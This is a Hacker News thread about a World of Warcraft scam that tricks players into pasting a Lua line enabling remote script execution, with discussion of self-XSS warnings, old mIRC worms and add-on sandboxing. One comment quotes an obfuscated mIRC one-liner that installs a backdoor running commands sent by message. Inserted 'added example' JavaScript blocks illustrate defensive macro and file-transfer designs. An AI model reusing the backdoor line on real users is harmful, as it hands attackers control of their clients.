World of Warcraft: one simple line of code can cost you dearly (2016) (gdatasoftware.com)
266 points by bdz on Oct 30, 2018 | 116 comments


It's funny that if you open developer tools on facebook.com, you get a nice message telling you not to copy things into the developer console.

Stop! t78-eatOBZQ.js:172 This is a browser feature intended for developers. If someone told you to copy-paste something here to enable a Facebook feature or "hack" someone's account, it is a scam and will give them access to your Facebook account. t78-eatOBZQ.js:172 See https://www.facebook.com/selfxss for more information.


You get this when trying to paste on any page in firefox console view:

Scam Warning: Take care when pasting things you don't understand. This could allow attackers to steal your identity or take control of your computer. Please type 'allow pasting' below (no need to press enter) to allow pasting.


I actually don't get that.


Dumb question, but have you ever pasted in the past? Once you do it once and turn on pasting, you won't get the warning again.

about:config --> devtools.selfxss.count needs to be 0 when Firefox boots up to get the warning.


"pasted in the past" I had to reread that a couple of times


Please try to make a more substantive contribution next time. Comments like this don't contribute to the conversation and have quite a distracting effect.

HN has its issues but the least we can do is to take care that the quality of discourse doesn't turn into another Reddit.


Your general concern is commendable, but some content-lite comments are worse than others, and sometimes just making nice is more important than calling it out when a comment is largely benign.


Fair! I actually deleted it first before going back and deciding to post it.

I've started to see more "content-lite" comments recently (along with puns), so I figured it might be good to over-index on pointing out community values.

Hopefully OP was able to see that it wasn't personal and that I meant no harm.


There used to be pretty widespread "worms" instructing you to paste javascript snippets into the developer console.


And "hacks" that would make your FB Page go viral and stuff. I used to hear that a lot from close friends and I remember how hard I wanted to laugh but couldn't.


WoW also does similar things to this; see the end of the article. It's good that they specifically relate it to losing items/gold, since many players actually may not make that connection, and may not think the risk is as big as it is.


Is this executed when you open the developer tools, or earlier, when the page is opened?


Reminds me of the old days of mIRC (popular IRC client back then) where you could (and still probably can) run a similar scenario using the mSL language (https://en.wikipedia.org/wiki/MIRC_scripting_language) directly from the chat input.

A script could literally take control of the computer because mIRC is able to load native code by loading arbitrary DLLs.


Back in the 90s mIRC would download files to the root directory of mIRC itself -- long before the concept of separating user data and code became the norm on Windows -- and if people had "auto accept file transfers" enabled, someone could send you a viral "script.ini" (as I recall it was called) and immediately overwrite your customisations. The end result would spread rapidly as the infected users would share it with others who joined and left the channels they were in.


mIRC by default would not auto-accept .INI files, there was a blacklist on certain file types that would be rejected, with INIs as one of them.


> mIRC by default would not auto-accept .INI files, there was a blacklist on certain file types that would be rejected, with INIs as one of them.

Was that a reaction to the problem described in the GP? Especially in the 80s/90s, defensiveness like that was probably to solve an existing problem.


Exactly that, it was known as the ‘script.ini’ problem, the download directory was changed as well.

It would attempt to send to people as they joined a channel.

More info: http://www.irchelp.org/security/si.html


There was also the funny magic string that would make half a channel's modems disconnect.


Ah, yes, I remember that. I think it was because the modems didn't differentiate between the various layers in the transport stream and took anything resembling low-level modem commands to be gospel.


This came in as a result of this. I specifically helped users fix this problem back in the day. Remember, this was the 90s.


Most *nix IRC clients let you do something like /exec to run shell commands.


Yes, but that's invoked at the client side. The mIRC vulnerability discussed is where a message would trigger an /exec due to mIRC auto-downloading a booby-trapped .ini file enabling /exec from external chats.

The equivalent UNIX example would be Irssi auto-downloading a Perl file, loading that, and that Perl script then /exec any commands sent by a remote machine. But as you know, Irssi wouldn’t support auto-downloading, let alone then loading that file too.


The thing you're talking about was in another thread.

I was thinking more of something like:

    //write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg YOURNICK Hello World

This used to be very common, you can google the base64 string for lots of results like https://slo-tech.com/forum/t75045


Well either way, you still couldn't instigate scripts from Irssi from a remote message unless the client specifically had a Perl plugin telling it to do so (ie the user purposely programmed the IRC client to do it).

Even other Windows IRC clients didn't have this issue. I remember mIRC being particularly terrible in terms of security back in the day. Which is part of the reason it was considered such a joke on any of the more serious IRC channels (that and other features like "mIRC colours"). It's also part of the reason I wrote my own Windows IRC client (this was back in the early to mid-90s so before I switched to Linux as my primary desktop OS).

So I think comparing mIRC to other *nix IRC clients isn't going to get you very far because mIRC was in a whole class of its own when it came to stupid vulnerabilities.



I really don't think your comment is a fair counter argument:

1. All your examples of "all irc clients" are just of BitchX. There are a whole plethora of other IRC clients out there yet you highlighted just the one client.

2. You're also just talking about the early versions of BitchX which were widely known as being insecure. So most people who cared stuck with Irssi. (BitchX these days is a lot more secure from what I understand).

3. BitchX didn't even exist "back in the day" as you're referencing. Its first release wasn't until something like the mid-00s. BitchX is actually a relatively late-comer to the scene. So it wasn't around in the era when mIRC had a bad reputation.

4. Breaking something with a fuzzer isn't even remotely in the same league as a feature which lets users auto-download config files into the application's directory nor the other mIRC bug you highlighted. If you need to start using fuzzers to prove a point then yes you win the argument that "everything is insecure" while completely missing the point being made about specific applications having massive and easily exploitable security holes in them.

Fact is, back in the mid-90s mIRC deserved its reputation. Things obviously improved by the late-90s (thankfully the developers kept releasing new versions of the client when new vulnerabilities were discovered) but mIRC - at that time - was uniquely awful.

For a time BitchX was also pretty bad. Not as bad as mIRC was in its era, but we're now talking a decade or two after mIRC and software development had moved on a lot in that time, so it's still a shame that BitchX did have the vulnerabilities it had. However I wouldn't use BitchX as an example that all Linux / UNIX based IRC clients - nor even all clients across any specific OS - were terrible in terms of security because that is simply untrue. Even some of the biggest problems that faced IRC as a protocol (eg IP address being public while internet connected home PCs weren't sat behind firewalls nor NATing, meaning it was easy to bypass IRC entirely and hack the host some other way) had been solved by the time BitchX came about.


>feature which lets users auto-download config files into the application's directory

FWIW irssi has this feature today.

It’s not on by default, just like it wasn’t in mIRC 20 years ago.

I don’t think you’re making a very convincing case that mIRC was particularly bad.


> FWIW irssi has this feature today.

Irssi's default behaviour is categorically not to auto-download any file someone DCC's to you.

Plus, even for those who do enable it, you can still set whitelists up for trusted nicks:

    /SET dcc_autoget ON
    /SET dcc_autoget_masks nick

It's the default behaviour that matters and Irssi is secure by default. Plus the aforementioned support of a whitelist offers you additional assurances should you wish to enable that risky feature.

> It’s not on by default, just like it wasn’t in mIRC 20 years ago.

I'm pretty sure it was in the early days but I might be wrong there. mIRC did have some crazy defaults initially but those were quickly changed.

> I don’t think you’re making a very convincing case that mIRC was particularly bad.

I beg to differ. You haven't given a single piece of accurate evidence to prove that any other client suffered from the same issues as mIRC. The closest comparison you could come up with was fuzzing against BitchX - which isn't even remotely as embarrassing as the mIRC flaws - and exactly nothing to prove any of the other "all of irc clients" (as you put it) were also equally insecure.

I used a lot of clients in the 90s. I wrote a couple too. mIRC was undoubtedly the most user friendly (excluding my second client, but I never got around to releasing that) but it was also the worst for security in the early days. Of course that did change. So it might have been the later years when you started using it, so you didn't experience some of the problems it had?
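The two controls argued about above, a deny-list of file types (mIRC rejecting .ini files by default) and a whitelist of sender masks (irssi's `dcc_autoget_masks`), combine naturally into one auto-accept policy. The following is an added example written for this thread; it is not irssi's or mIRC's code. It assumes the common `nick!user@host` mask form with `*` wildcards, that an empty mask list means "anyone" (as the irssi setting is usually understood), and the deny-listed extensions, sender strings and offers are all constructed for illustration.

```javascript
// Added example (not from the thread, and not irssi's or mIRC's own code):
// a DCC auto-accept policy = file-type deny-list + sender-mask whitelist.
// Extensions the client would treat as configuration or code rather than data
// are never written to disk automatically, whoever sends them. (Constructed list.)
const DENIED_EXTENSIONS = new Set(["ini", "mrc", "exe", "bat", "vbs", "dll"]);

// Compile a nick!user@host mask such as "friend!*@*.example.org" into a RegExp.
// "*" matches any run of characters; every other character is literal.
function compileMask(mask) {
  const escaped = mask
    .replace(/[.+?^${}()|[\]\\]/g, "\\$&") // escape regex metacharacters except "*"
    .replace(/\*/g, ".*");                  // then turn "*" into a wildcard
  return new RegExp("^" + escaped + "$", "i");
}

// Lower-cased extension of the offered file name, after stripping any path
// component a sender might have smuggled into the name.
function extensionOf(filename) {
  const base = filename.split(/[\\/]/).pop();
  const dot = base.lastIndexOf(".");
  return dot === -1 ? "" : base.slice(dot + 1).toLowerCase();
}

// Decide whether an incoming offer may be saved without the user's explicit
// confirmation. config = { autoget: boolean, masks: string[] } (assumed shape);
// offer  = { sender: "nick!user@host", filename: string } (assumed shape).
// Returns { accept, reason } so the caller can log why a transfer was refused.
function autoAcceptDecision(config, offer) {
  if (!config.autoget) return { accept: false, reason: "autoget disabled" };
  if (DENIED_EXTENSIONS.has(extensionOf(offer.filename))) {
    return { accept: false, reason: "denied file type" };
  }
  const masks = config.masks.map(compileMask);
  // Assumption: an empty whitelist means every sender is allowed, as with irssi.
  if (masks.length > 0 && !masks.some((re) => re.test(offer.sender))) {
    return { accept: false, reason: "sender not in whitelist" };
  }
  return { accept: true, reason: "ok" };
}

// Constructed sample: whitelist one friend, then evaluate a few offers.
const sampleConfig = { autoget: true, masks: ["friend!*@*"] };
const sampleOffers = [
  { sender: "friend!u@host.example", filename: "photo.jpg" },
  { sender: "friend!u@host.example", filename: "script.ini" },
  { sender: "stranger!u@other.example", filename: "photo.jpg" },
  { sender: "friend!u@host.example", filename: "..\\script.INI" },
];
for (const offer of sampleOffers) {
  const d = autoAcceptDecision(sampleConfig, offer);
  console.log(`${offer.sender} -> ${offer.filename}: ${d.accept ? "accept" : "refuse"} (${d.reason})`);
}
```

The ordering matters: the file-type check runs before the whitelist so that a compromised friend's account still cannot deliver a script file, and the path-stripping in `extensionOf` means a name like `..\script.INI` is judged by its real extension rather than slipping past a naive `endsWith(".ini")` test.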


>I'm pretty sure it was in the early days but I might be wrong there. mIRC did have some crazy defaults initially but those were quickly changed

I had a mircv37 installer laying around, autoaccept was not the default back then. I’m pretty certain it never was.

>I beg to differ. You haven't given a single piece of accurate evidence to prove that any other client suffered from the same issues as mIRC.

We haven’t really established what issues mIRC suffered from, besides the DCC issue that still exists in irssi today.


Maybe mIRC attacks were more prevalent because mIRC users were generally less savvy than their Irssi counterparts?

My memory might be fuzzy but it definitely felt like mIRC was getting disproportionately "pwned" at the time.


Out of curiosity, why is it ever a good idea to add a command to execute arbitrary strings in the same space as the user? eval() has been the same source of headaches in javascript over the years.

I believe WoW uses it primarily to let the player make macros, which is a legit use, but using something like RunScript to do it seems lazy.


eval is by far the easiest way to run arbitrary code, but you can write eval yourself in any fully-general programming language. It doesn't actually give attackers any additional power.

This isn't the eval attack where you accidentally pass attacker-controlled inputs into eval because of an escaping problem or something; the sole purpose of /run is to allow users to run arbitrary Lua in the UI.


Metaprogramming. It's possible to generate source code and then evaluate it. For example: one can write a parser generator that compiles a grammar to a Javascript function definition that parses that grammar, which can then be evaluated from within Javascript in order to create the custom function.


JavaScript needs a way to load a script from another script. That functionality is equivalent to eval(), whichever way you build it.
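The exchange above turns on one design question: a macro feature does not have to be built on arbitrary code evaluation. The following is an added example written for this thread, not code from the article, from WoW or from any game client. It uses JavaScript's `Function` constructor (the same class of facility as `eval`) to stand in for a `/run`-style command, and sets a constructed allow-listed macro language beside it; the player state, the command names `target`, `cast` and `say`, and the macro texts are all invented for illustration.

```javascript
// Added example (not the article's or any game's code): a macro runner built on
// arbitrary code evaluation versus one built on a restricted command language.

// Constructed player state that macros act on. Gold stands in for anything
// valuable that a pasted line should never be able to reach.
function makePlayer() {
  return { gold: 1000, target: null, log: [] };
}

// The complete set of actions a macro may trigger. Handlers receive the player
// and the remaining words of the line as plain strings; nothing else is reachable.
// Object.create(null) gives a table with no prototype, so "constructor" and
// friends cannot be looked up by accident.
const MACRO_COMMANDS = Object.assign(Object.create(null), {
  target: (player, name) => { player.target = name; },
  cast:   (player, spell) => { player.log.push(`cast ${spell} on ${player.target}`); },
  say:    (player, ...words) => { player.log.push(`say ${words.join(" ")}`); },
});

// "Lazy" design: the macro text is handed to the language runtime unchanged,
// so a line someone talked the player into pasting can do anything the UI
// code can do, including emptying the purse. Function() stands in for eval.
function runMacroWithEval(player, macroText) {
  return Function("player", macroText)(player);
}

// Restricted design: each line is tokenised, the first word is looked up in the
// allow-list and the rest are passed as string arguments. Unknown verbs are
// reported, never executed. Returns the list of errors (empty on success).
function runMacroRestricted(player, macroText) {
  const errors = [];
  for (const rawLine of macroText.split("\n")) {
    const line = rawLine.trim();
    if (line === "" || line.startsWith("#")) continue; // blank or comment line
    const [verb, ...args] = line.split(/\s+/);
    const handler = MACRO_COMMANDS[verb];
    if (typeof handler !== "function") {
      errors.push(`unknown command: ${verb}`);
      continue;
    }
    handler(player, ...args);
  }
  return errors;
}

// Constructed sample: the same "helpful" line fed to both runners.
const pastedLine = "player.gold = 0";
const evalPlayer = makePlayer();
runMacroWithEval(evalPlayer, pastedLine);
console.log("eval-based runner, gold left:", evalPlayer.gold);        // 0

const safePlayer = makePlayer();
const errors = runMacroRestricted(safePlayer, `${pastedLine}\ntarget Bob\ncast Heal`);
console.log("restricted runner, gold left:", safePlayer.gold);        // 1000
console.log("restricted runner, errors:", errors);                    // one unknown-command error
```

The restricted runner still gives players the macro capability (sequence a few commands in one line) without giving a pasted string the power of the whole scripting environment; what it gives up is exactly the generality that makes `/run` dangerous in the hands of a social engineer.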


It would have been funny to simply pretend that you had entered the line, just to see the social engineer send you Lua code in plaintext.


And immediately after, tell him there's a syntax error, and how to fix it.


Discussion back when this was posted in 2016: https://news.ycombinator.com/item?id=12158299


playing World of Warcraft can cost you dearly


Can’t see that as a valid argument. Doing anything in life can cost you dearly.

Personally wow curved me around 2004-2007 as a person. Helped me find my passion about development in general.

I didn’t feel like I’ve lost something playing wow, actually I have fond memories of it. Only thing I would change if I could go back was just to spend a bit less time on it, but again I’d play it with passion.


I wouldn't say that playing WoW costs you dearly or is detrimental or toxic to people. I will say that all of the people I've known who played games to their own detriment or in a way that was toxic to their lives were playing WoW. It is attractive to people who want to escape from their problems and not solve them. Because of this, it has somehow come to be seen as a cause of that escapism. It definitely becomes part of a vicious circle -- I play too much WoW because I'm stressed -- I'm not more stressed because I play too much WoW -- but that's the fault of the player, not the game.


All you have seen is correlation. Maybe it is a correlation, because I bet you didn't try to gather data properly. Assuming that this is a correlation, it might be, for example, that people who for some reason cannot cope with their problems tend to escape from them to WoW, and if there were no WoW, they'd do it some other way.

I know it myself. I can run away from my problems by thousands of ways. Cut them all off, and I'll find two thousand more. I can play video games, read books, code some useless programs, engineer some useless devices, surf the internet for interesting news, participate in flamewars, write this message, or as a last resort I can just sleep for 20 hrs a day. If I cannot cope with my problems, then I cannot. My actual behaviour is just a symptom, not the cause of my inability.

It is just anecdotal evidence, for other people it can be the other way around, and maybe for them WoW is the cause of their inability to cope with their problems. What I want to say: don't make conclusions about causation on correlational observations.


Partially true but in my experience if you are cut off of WoW you will not find another way to procrastinate immediately. That's why there were studies that kids and teenagers being cut off from smartphones/tablets have found themselves more mentally healthy. You can search for those, they are out there.

So while I agree in principle -- that the inability to address one's problems is not fixed overnight -- it's also true that removing the distractions you crave the most can and will push you to healthier habits even in the short term.


They did say "can" cost you dearly, and didn't preclude other endeavors from costing you...

The ills of over indulging on anything seem fairly obvious.


Nowadays (EDIT: anecdotally, sourced from myself, friends, and forums/Reddit), there's been a player exodus in WoW, as the latest expansion (Battle for Azeroth) has an unrewarding and mandatory grindy endgame, in addition to other player-unfriendly changes which the playerbase suspects are there to pad out time-played metrics.


I'm not sure if this is a proper place to discuss WoW, but as a long standing player I can say that BfA is much better in terms of grinding than the previous expansion, Legion. You don't really need to grind anything, exactly because that grind is unrewarding, and you were obliged to grind in Legion exactly because that grind was giving too much power. Again, according to my experience I'm not seeing a big player exodus; most of those who started playing in my guild continue to play, but that's only a personal anecdote, of course. Legion was much better in terms of perceived development cost: new gameplay systems, loads of new art and content, while BfA feels like a cheap addon built upon the Legion investment, but that doesn't really make it bad, it just feels that they could do better.


> You don't really need to grind anything, exactly because that grind is unrewarding, and you were obliged to grind in Legion exactly because that grind was giving too much power.

Interesting perspective. I've always wondered if rewarding grinds or unrewarding nongrinds are better for both player enjoyment and monetization. (I think the former does better; it's how addiction works)


There are different players with different needs which are often contradictory. I don't like to spend much time in-game. Ideal WoW for me is 3 hours/3 days a week, when I log in, enter a raid with my friends, spend some time inside trying to kill some bosses, log out. But there are many people who want to play 8-12 hours every day and they love when they can spend that time improving their character. So developers are trying to balance the game for both types of players. Basically they are doing rewards which diminish in geometric progression. You can spend an hour to get 1% power increase. The next hour will get you 0.5% power increase and so on, so you can spend hours and get that increase, but there's some limit and different players can draw it for themselves. Those who spend more time will be more powerful and those who don't want to spend too much time won't be that far behind. But still some players think that they are obliged to spend those hours to farm those few % of power even if they hate the process; they just want the rewards. It's unhealthy behavior and only self-control might help there, I guess, otherwise the player will burn out and unsubscribe from the game. Probably a hard balance from the game developer's perspective.


It is basically a race to ilvl 320 and then run warfronts for gear and then go raid/heroics if inclined. Personally, I wish they'd open warfronts up earlier and the gear you get have ilvl similar to how world quest rewards "scale" as your ilvl increases.

I play solo which is an anomaly in the genre I know, but I'm starting to feel burnout: need to run the wheel multiple times so I can do various tradeskills (the 2 tradeskill, including gathering skills, max per character thing) to be self sufficient. Need to do content on characters I'm not interested in doing the content on because, oh, my mage is my tailor and I want to craft bags for my characters which requires non-100% drop BoP tradeskill drops among other things. Reputations supposedly are going to be more forgiving in 8.1, but I'm not sure if it is just Champions of Azeroth that is shared by characters (probably for the neck upgrade) or if all of the BfA reps will be shared across characters (hoping so, for tradeskill rank upgrades).


> I play solo which is an anomaly in the genre I know

Not as uncommon as you think, https://youtu.be/b2l2ZxNhCSg


Even if that's true, the game has had incredible longevity. That expansion came out 14 years(!) after the original release of the game. I'm sure the player base isn't what it used to be, but that has to be some kind of record.


There are longer running MMOs, and the playerbase has faded a bit, but you're absolutely right - it's still a monolith, and the one to which all other MMOs are compared. Regardless of the BFA problems, it still wields a huge amount of power.


> the game has had incredible longevity

I'm not a WOW player (or really any MMO), but it's always impressed me how willing Blizzard is to throw out all the investment people have made in learning the game system details. Talent trees (or whatever they are called) are rewritten practically each expansion to follow very different rules.

I suppose it has to do with knowing that NOT changing is a guaranteed loss over time, but still, it feels like an unusual attitude.


It's a trend-setting attitude. Relearning skill builds is easy and relatively fun because you already have the skill points/levels and all you do is just allocate them again (provided the new ones are balanced and fun). What Blizzard is doing is basically resetting the entire progress of every player in the game every expansion. You might spend 2 years building up your end-game gear and then an expansion comes and the common drops from one level higher are more powerful than the highest drops from the previous one.


Eve Online is still kicking with its frequent updates (they shifted from an expansion every 6 months to a release every 6 weeks about 2 years ago)


That's gotta be some sort of record. I can't think of any other game which is still releasing full expansions 14 years later.


It's a big downgrade from the previous expansion (Legion), which had a playerbase close to WoW's peak.


That information came from a blog post which was later refuted by Blizzard.


EverQuest is 5 years older than WoW, and still chugging along. They aren't doing two expansions a year anymore like they did from 2003-2007, but they have done one a year from 2008 onward (the 2018 expansion is coming out next month).

There was some worry earlier this year that it would abruptly die because of US sanctions on Russian oligarch Viktor Vekselberg who owns the investment group Columbus Nova. The sanctions were freezing assets and blocking payment processing.

There had been earlier reports that Daybreak Games, the company that acquired EverQuest years ago from Sony, had been bought by Columbus Nova. Daybreak later clarified that the person who bought them had been a partner at Columbus Nova, but he bought them personally, not for Columbus Nova, and he was not under sanction.

That was 10 months ago, and they still have their assets and can still accept payments, so apparently they were indeed not part of Columbus Nova. (Although at the time they were bought, a lot of Daybreak people did mention that name, rather than the name of the partner who now they say is the owner, so it is all still confusing).

Anyway, EverQuest today is worth a look if (1) you used to play and want some nostalgia, or (2) you never played but would like to see what one of the classic MMORPGs was about, or (3) if you would like an interesting game, good for grouping or solo play, that has a massive amount of content even if you are playing free.

There were three big changes on the "live" servers (which are distinct from the "progression" servers, which I'll describe later) that made the game a lot more friendly for casual and solo play.

First, a few years ago they added in-game NPC mercenaries that you could hire (one mercenary at a time per character). You can hire a tank, healer, melee damage dealer, or ranged damage dealer, and the AI for the mercenaries is pretty good. They "understand" group play.

With mercenaries, a whole lot of formerly full group only content can be taken reasonably by a couple players each with a mercenary, and even a lot of it can be done with one player with a mercenary, at least up to level 60ish if you are playing free, and up to at least mid 90s if you are paying [1].

Second, they introduced a new line of armor and weapons, Defiant Armor and Defiant Weapons. These things drop from a lot of normal encounters, but the stats on this stuff is comparable to top raid gear from a few expansions earlier. With Defiant, you don't have to dedicate your life to equipping your character to be able to handle the top content from an older expansion. It's only the people who are chasing the leading edge that have to make EverQuest a second career, unlike the old days.

Third, on the role playing server, Firiona Vie, there is a big experience bonus and very, very few items are marked NO DROP. So if you do need gear better than Defiant gear, you can trade for it or buy it from other players. Mana and healing rates are also higher than older players will remember.

Fourth, there are some great new quests. You start out with a book called the Tomb of the Heroes Journey in your inventory. When you open it, it tells you several zones that would be good at your level. If you open it when you are in one of those zones, it suggests several NPCs who have tasks, quests, and problems you might help with. Just following the Heroes Journey will give you plenty of fun stuff to do, and that is only the tip of the iceberg.

With a mercenary and a free account on FV, you've got an excellent solo game for a long time. Even better for a group of friends.

For those who played before, and are nostalgic for the old days, they have "progression" servers. There are several, but the overall theme is the same. A progression server starts with some old version of EQ, and then progresses through the expansions. Progression servers do not have mercenaries, or Defiant armor. Heck, they are even missing later UI features when they start, such as the wonderful multiple target tracking system that the live servers have.

Progression servers have other rules, varying depending on server, to try to recreate the classic EQ experience that server's players want. For example, one of them is a "true box" server. That means you can only play one account per computer at a time. If you are one of those people who wants to play N characters at once on the same server, you have to have N physical computers if you are on a true box server.

They also differ in when expansions become available. Some do it on a fixed time schedule. Some do it when the endgame content of the previous expansion is defeated. Some do it by vote. They also differ in how far they go. For example, Agnarr unlocks expansions on a schedule, but will stop at Planes of Power plus the two smaller expansions that followed that. Many consider that the best era of EQ, and Agnarr will be frozen in that era.

Progression servers are not available to free players.

So for those who want a shot of nostalgia, or who never played and want to check out the classic game, the best thing to do is watch for the next progression server launch, and subscribe. A new progression server is always a high population server, with population density comparable to the old days.

[1] The difference is mercenaries. There are apprentice mercenaries, with 5 skill levels (tier I to tier V) and journeymen mercenaries (tier I to V). Free players can only hire apprentices. Around mid 50s a tier V apprentice starts to struggle.


Nostalgia and then reality results in disappointment.

I played EQ 1 for a few years starting in 1999. It was a blast. People were always ad-hoc grouping together, talking to each other after a camp fight.

I remember just starting and my home base being in Qeynos and a bunch of us level 5s went with a lvl 12 on an adventure to Freeport. Most of us died and we helped each other with corpse runs. Trains coming out of Black Burrow were a blast, everybody would zone out to that little corridor into West Qeynos.

Those days are over though. I did download Project '99 years ago, went through a bunch of hoops to get it running, and 15 minutes later after logging in, just deleted it. Nostalgia meets reality.


Loud critics make up a tiny percentage of the player base. You have no idea what the numbers are and won't until blizz releases them.


Blizz stopped releasing numbers. Now they make PR statements that are intentionally misleading. Given the popularity of addons, some addon makers have a good amount of data that reaches beyond "no idea".


Wow I didn't realize they stopped publishing sub numbers so long ago. I'm not convinced that add-ons give us great insight beyond a certain level of player who tends to use specific add-ons (e.g. DBM), but yeah it's better than nothing.

Still, historically we know that big drama does not correlate to a mass drop in sub numbers. Hell, GC just posted something about that a week or two ago[1].

>Dropping a game because of a specific design change (despite what you might read on forums / Reddit) is actually pretty rare. I know it happens, but if you’re stack ranking the reasons why people quit, those specific responses end up being so far down the list that it is hard for a development team to take actionable feedback.

WoW remains massively successful as far as I'm aware.

[1]: https://askghostcrawler.tumblr.com/post/157080214673/unsubbi...


Curious - have they made any of the numbers public?


They used to as part of their quarterly earnings reports, if I remember correctly. They stopped during the latter part of WoD when by all accounts the subscriber numbers were very low (by WoW standards).


As far as I'm aware not since the Wrath of the Lich King expansion.


Source? Even though Battle for Azeroth had a rocky start, WoW still has a massive player base.


Fair: added an edit.


I know you're probably saying this in terms of money, but I had to stop because it was an addiction to play Wow... This game is so addictive to me (I'm sure not just me)! I can't watch streams because it will give me the urge to play.

I hope one day I'll be able to play it normally, but I'm not sure. So yeah definitely it can "cost" a lot to play.


Can you elaborate? I'm genuinely interested.

I seem to have addictive tendencies, but there's a whole multi-dimensional spectrum, as far as I can tell. In my case, when I'm working overtime, I'll jump into a game every few hours for 30-60min just to let some of the stress off. It's quite effective, but I end up popping figurative gaming-pills instead of learning to deal with stress in a constructive way. I'll also do something like that after a tiring day. It's not good, because it's grown into an urge that I get when it's time to relax, so I neglect other parts of life to which I'd ideally dedicate that free time.


Specifically, with World of Warcraft it's a game that takes all of your time.

It's an endless treadmill with diminishing returns. It's full of (digital, ultimately meaningless) rewards which make you stand out above the rest of the players. Some of them are worthless in a few weeks/months (e.g. gear), some of it is timeless (e.g. mounts) but takes hundreds of tries (every try 30-60 min) for that 1-5% chance at some mount.

When I played the game, there were people who did nothing all Wednesday (when they could try again for the week) but run hours and hours of dungeons just so they could have a chance to get the last 10-100 rare mounts they missed.

The highest-tier end-game content requires large groups (20 players + reserves) to coordinate schedules and tackle dungeons together. This causes enormous social pressure to keep showing up because otherwise the group can't play the game and everyone is mad at you.

It's perfectly possible to play it casually without participating in the above, but it's a game that has a lot of traps for people prone to addiction to fall into.


I would add that you can suffer from "Altoholism" too, and this was my case. I could not commit time for raiding or doing high-end content, so I would just level characters to max level.

So one main for solo content of the week and then back to leveling alts.


The game kind of forces this with the 2 trade skill max per character (provided you are interested in that part of the game, that is. But I've always gravitated towards that from my first MMO, Ultima Online, playing a blacksmith/miner).

And then Legion with the content that was specific to each class. Loved that idea, but it really made you feel like you were missing out if you didn't have x class to see something.

If FFXI's leveling wasn't so group focused and slow, I'd probably love that system above anyone else: I do like the idea of needing to level various classes, but I'd prefer it be all on one character instead of 12 or so I need to manage.


>If FFXI's leveling wasn't so group focused and slow, I'd probably love that system above anyone else: I do like the idea of needing to level various classes, but I'd prefer it be all on one character instead of 12 or so I need to manage.

Wouldn't FFXIV fit the bill?


FFXIV's mechanic is that you swap gear and that swaps class or something to that effect (I'm not 100% sure). So if I leveled to 15 in ClassA, put on gear for ClassB, I'm a level 15 ClassB.

I'd prefer the job system where you switch to ClassB, but have to level accordingly. I'd hate to be max level in ClassA and then want to try another class and outlevel content to really practice the class properly (or be swamped with skills early) or end up being unable to help a group because skill in another class is inadequate.

So basically, FFXI but with soloable leveling (in FFXI apparently you could solo with beastmastery or something as a subclass, pet tanking I believe, but it wasn't a starting class so you'd have to work to get it).


No you have to level all jobs individually in FFXIV. Changing the weapon does change the class but you still have to level.


oh, well I may just have to give that another look then. Thank you both for correcting my misunderstanding of that mechanic.


I was using WoW to evade the stress from work and life in general. I was doing this at the cost of my family. So on week nights, instead of doing something with my wife, I would just jump online and play. I was watching the kid but she's playing by herself and doesn't need me directly, so I guess I can do a few quests, no problem.

So my problem was that gaming was winning over other things all the time, on almost every occasion. I was evading responsibilities at home, neglecting my relationship with my wife and not giving quality time to my daughter.

So now I'm about 3 months free of gaming and, while it's been hard, I can now see I was using it not for the right reasons.


Actually I agree with you, it's not about the money but addiction.


Does the Lua script interface have a vulnerability for actual remote code execution? Can someone launch calc.exe with the HUD API?


While this attack does not discuss that particular detail, there have been many documented methods for breaking out of the sandbox (you can google around to see citations). I think for most attackers getting access to the user's WoW API is the goal.


No, you need to find another vulnerability to break out of the Lua sandbox.


As a player of a different game, Elder Scrolls Online, is there any similar danger? The add-on system I believe is also Lua.


The difference is Elder Scrolls Online doesn't have a command to run a script inline from the chat window.

So you are pretty safe unless you specifically install a compromised add-on. It is definitely possible for add-ons to mail stuff from your account automatically, including gold, because some add-ons have a "tip" feature built in, and some operate by using the mail to help you transfer stuff to a mule character. So a compromised add-on could just set it up so every time you log in it automatically mails 1000 gold to another account.

But at least you would have to install the plugin explicitly instead of just compromising yourself via the chat window.


You can actually run Lua scripts from chat, exactly the same way:

`/script d("Hello")`

But the PC/Mac ESO community tends to be older (rated M) and less gullible in chat. Gold-sellers got a cold reception and rapid bans.

I suspect that'd work on console players, who tend to be younger, if they had scripting and addons, which they do not.


Yes, but most of these Lua games have no remote execution.

Just don't copy magical things from people.


tl;dr: if you run untrusted code from malicious actors, bad things will happen.

Nothing new here.


As a moderately sophisticated user, I wouldn't have expected the function RemoveExtraSpaces to immediately enable an RCE attack. It sounds pretty innocuous.


I don't think RemoveExtraSpaces has any RCE, but it is overwritable. The "hack" is tricking the user into overwriting it with a different function called RunScript.


So really the culprit is monkey-patching.


Which is complicated by the fact that any addon (and many users use a dozen or more) can do this on initialization without the user knowing at all.


Any add-on added by the user is already executing in the client's space and has zero need for a vulnerability like this.

It's like saying that any program running on my computer could exploit a remote code execution bug... I mean, yes, it could. But why would it, when it already has local execution rights?


Because if the add-on just opens up a backdoor, the author can do more specifically targeted things at their whim rather than blasting everyone who installed it? Harder to get caught.


Still zero need for this kind of exploit. The author of the addon can already do specifically targeted things at whim at a later point in time.


I mean it was already maliciously exploited in a highly used addon. It was a lot easier to slip in a short one liner than some highly suspicious "hack the user" blob of code. It was also extremely flexible. They could then do different things to each person instead of one fixed attack.


You’d naturally expect a game’s add-ons to be sandboxed, perhaps with permission requests, à la mobile, wouldn’t you?

The installation of an add-on shouldn’t inherently give it free rein, with the only possible defense being trust & source-code review.


Addons are sandboxed. They can affect the game interface (in limited ways) and other addons, but not other software or files. And it's kind of hard to require further sandboxing, because that would limit addon power, and one of the reasons people like WoW is exactly because addons allow very deep interface customization.


That's why I'm thinking you'd naturally involve a simple permissions model [let script access chat?], just to avoid surprising behavior. Or more specifically, in-game I/O operations (e.g. trading, sending, etc.). The latter would really protect you from everything malicious I can think of, outside of deleting-your-inventory kinds of attacks.


There are protection mechanisms for many actions in the game. You can't use spells with addons, you can't move your character, etc. Many actions require a hardware event, e.g. you can't just buy something, you need to press a button for that. If you're sending mail with gold, you need to confirm that you really want to send that gold, and an addon can't override that confirmation (so a malicious addon can't invisibly send your gold to someone). There wasn't protection for the trade window, so a malicious attacker could steal your gold and/or items, but Blizzard added that protection very quickly after that exploit was found.

It's just a game, so they don't take it very seriously, I guess. They could just revert the transaction using their moderator powers if something bad happens.


And a very popular addon did, once, although from what I remember it was debugging code accidentally left in. See ElvUI Backdoor: https://www.reddit.com/r/wow/comments/2jhlzv/psa_elvui_has_a...


